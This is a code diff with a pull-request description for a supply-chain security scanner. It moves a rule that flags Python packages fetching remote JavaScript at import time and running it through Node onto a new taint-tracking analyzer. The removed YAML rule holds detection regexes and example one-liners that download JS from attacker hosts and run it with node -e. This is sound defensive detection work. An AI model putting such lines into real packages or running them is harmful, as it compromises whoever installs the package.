 	// analyzer only inspects install/import-time entry points.

--- a/internal/rulecatalog/catalog.go
+++ b/internal/rulecatalog/catalog.go
@@ -22,6 +22,7 @@ import (
 	"github.com/garagon/aguara/internal/engine/jsrisk"
 	"github.com/garagon/aguara/internal/engine/nlp"
 	"github.com/garagon/aguara/internal/engine/pkgmeta"
+	"github.com/garagon/aguara/internal/engine/pyrisk"
 	"github.com/garagon/aguara/internal/engine/rugpull"
 	"github.com/garagon/aguara/internal/engine/toxicflow"
 	"github.com/garagon/aguara/internal/rulemeta"
@@ -117,6 +118,7 @@ func Build(opts Options) ([]rulemeta.Rule, error) {
 	out = append(out, ci.RuleMetadata()...)
 	out = append(out, pkgmeta.RuleMetadata()...)
 	out = append(out, jsrisk.RuleMetadata()...)
+	out = append(out, pyrisk.RuleMetadata()...)
 	out = append(out, nlp.RuleMetadata()...)
 	out = append(out, toxicflow.RuleMetadata()...)
 	out = append(out, rugpull.RuleMetadata()...)

--- a/internal/rulemeta/rule.go
+++ b/internal/rulemeta/rule.go
@@ -63,5 +63,6 @@ const (
 	AnalyzerNLP       = "nlp"
 	AnalyzerToxicFlow = "toxicflow"
 	AnalyzerRugPull   = "rugpull"
+	AnalyzerPyRisk    = "pyrisk"
 	AnalyzerPattern   = "" // YAML-driven rules; empty so JSON omits the field
 )

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -618,37 +618,6 @@ examples:
     - "const dir = path.join('claude', 'settings.json'); // not the hidden dir"
     - "path.join('.claude', 'hookspad') // typo, not the hooks/ path"
 ---
-id: PY_IMPORTTIME_REMOTE_JS_001
-name: "PyPI import-time remote JavaScript execution"
-description: "Detects a Python package that, at install or import time (setup.py / __init__.py), downloads remote JavaScript and runs it through Node. This is the TrapDoor-style PyPI payload: an import-time fetch of attacker-hosted .js executed via node -e. Requires all three signals (remote retrieval + Node execution + a JavaScript payload reference) so packages that merely mention Node or JavaScript do not trip it."
-severity: CRITICAL
-category: supply-chain
-targets: ["setup.py", "__init__.py"]
-match_mode: all
-remediation: "Remove the remote fetch and Node execution from package import/setup code. Packages must never download and run remote code at install or import time. Audit the host for credential exposure and rotate any tokens reachable from the build or import environment."
-patterns:
-  # (1) Remote retrieval bound to a JavaScript payload: a fetch call
-  # whose argument is a .js URL (optionally with query/fragment) or the
-  # campaign host. Binding the .js to the fetch call in one pattern
-  # means an unrelated `.js` string elsewhere in the file (package_data,
-  # a fetched config.json) does not satisfy this signal.
-  - type: regex
-    value: "(?i)(requests\\.get|httpx\\.get|urllib\\.request\\.urlopen|urllib\\.request\\.urlretrieve|aiohttp\\.[a-z_]+|\\burlopen|\\burlretrieve)\\s*\\([^)]*(\\.js[\"'?#)]|ddjidd564\\.github\\.io|defi-security-best-practices)"
-  # (2) Node EVAL of a payload (node -e / --eval, shell or argv form).
-  # The eval form is required so a local `node build.js` does not count.
-  - type: regex
-    value: "(?i)(node\\s+(-e|--eval)\\b|[\"']node[\"']\\s*,\\s*[\"'](-e|--eval)[\"'])"
-examples:
-  true_positive:
-    - "import urllib.request, subprocess; js = urllib.request.urlopen('https://ddjidd564.github.io/defi-security-best-practices/x.js').read().decode(); subprocess.run(['node', '-e', js])"
-    - "import requests, os; payload = requests.get('https://evil.example/risk-profiler.js').text; os.system('node -e ' + payload)"
-    - "import requests, subprocess; js = requests.get('https://evil.example/p.js?v=2').text; subprocess.run(['node', '--eval', js])"
-  false_positive:
-    - "cfg = requests.get('https://example.com/config.json').json()  # config only, no execution"
-    - "subprocess.run(['node', 'scripts/build.js'])  # local build, no remote fetch"
-    - "js = requests.get('https://cdn.example/foo.js').text; subprocess.run(['node', 'scripts/build.js'])  # fetched asset, but node runs a local file, not -e the payload"
-    - "# Optional: pipe results.js through node -e after you download it yourself"
----
 id: RS_BUILD_WALLET_EXFIL_001
 name: "Rust build.rs wallet/keystore exfiltration"
 description: "Detects a Cargo build script (build.rs) that reads crypto wallet or keystore material (Sui / Move / Solana / Aptos keystores, mnemonics) and sends it over the network. This is the TrapDoor-style crates.io payload: build-time theft of signing keys. Chain-based: requires BOTH a keystore reference AND a network exfil sink in the build script, so a build.rs that merely compiles native code or a normal app that reads a wallet without any network does not trip it."


### PR DESCRIPTION
## Summary

Makes `PY_IMPORTTIME_REMOTE_JS_001` precise. It previously fired on co-presence: a remote `.js` fetch **and** a `node -e` anywhere in `setup.py` / `__init__.py`. Now it fires only when the two are actually connected: the value passed to `node -e` / `--eval` traces back, in one or two simple assignment hops, to a remote JavaScript fetch in the same file.

This catches the real TrapDoor-style payload (fetch attacker-hosted JS at install/import time, run it through Node) while dropping the false positives that mere co-presence produced.

## What changed

- New small analyzer `internal/engine/pyrisk` (targets `setup.py`, `__init__.py`). It tracks variable assignments line by line and propagates taint at most two hops. It is intentionally not a Python parser: no AST, no cross-function analysis, no dynamic imports. Comments and docstrings are stripped so documented or commented-out examples do not fire.
- Same rule ID, same severity (CRITICAL). The detection moved off the YAML pattern rule (removed) onto the analyzer, so there is no double finding; `aguara explain` and `list-rules` still show it.

## Why

A CRITICAL rule that fires on co-presence produces noise: a package that fetches a `.js` asset and separately runs a local `node build.js` would trip the old rule. Binding the fetched value to the `node -e` argument removes that whole class of false positive without weakening the true-positive case.

## Test plan

- [x] TP: `fetch .js -> var -> node -e var`; `fetch -> transform -> node --eval`; `os.system("node -e " + var)`; js-URL-in-variable then fetched.
- [x] FP: `node build.js` (no `-e`); `config.json` fetch + `node -e`; unrelated `node -e var`; commented-out payload; docstring describing the technique.
- [x] Precision: the exact malicious shape in `utils.py` does not fire (only import/setup-time files); it does fire in `__init__.py`.
- [x] `go build` / `go vet` / `golangci-lint` (0) / `go test -race ./...` all pass.

Still local, deterministic, no package execution.